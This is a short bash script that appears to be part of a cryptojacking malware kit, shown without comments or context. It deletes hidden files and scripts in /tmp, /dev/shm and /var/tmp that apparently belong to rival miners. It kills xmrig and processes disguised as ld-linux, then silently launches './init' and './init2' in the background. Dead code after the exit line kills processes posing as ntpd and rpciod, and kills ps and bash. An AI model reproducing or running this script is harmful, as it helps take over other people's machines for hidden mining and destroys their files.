#!/bin/bash
rm -rf /tmp/.FILE
rm -rf /tmp/.FILE*
rm -rf /dev/shm/.FILE*
rm -rf /dev/shm/.FILE
rm -rf /var/tmp/.FILE
rm -rf /var/tmp/.FILE*
rm -rf /tmp/nu.sh
rm -rf /tmp/nu.*
rm -rf /dev/shm/nu.sh
rm -rf /dev/shm/nu.*
rm -rf /tmp/.F*
rm -rf /tmp/.x*
rm -rf /tmp/tdd.sh
killall -9 xmrig
killall -9 ld-linux
kill -9 `ps x|grep xmrig|grep -v grep|awk '{print $1}'`
kill -9 `ps x|grep ld-linux|grep -v grep|awk '{print $1}'`

nohup ./init >> /dev/null &
sleep 3
cd ~
pwd > dir.dir
dir=$(cat dir.dir)
if [ -d "$dir/.ttp" ]; then
	exit 0
else
	nohup ./init2 >> /dev/null &
fi
exit 0

pkill -f "[ntpd]"
pkill -f "[rpciod]"
pkill -f "b 22 500"
pkill -f "ps"
pkill -f "bash"

killall -9 ps
kill -9 `ps x|grep ps|grep -v grep|awk '{print $1}'`
kill -9 `ps x|grep 500|grep -v grep|awk '{print $1}'`
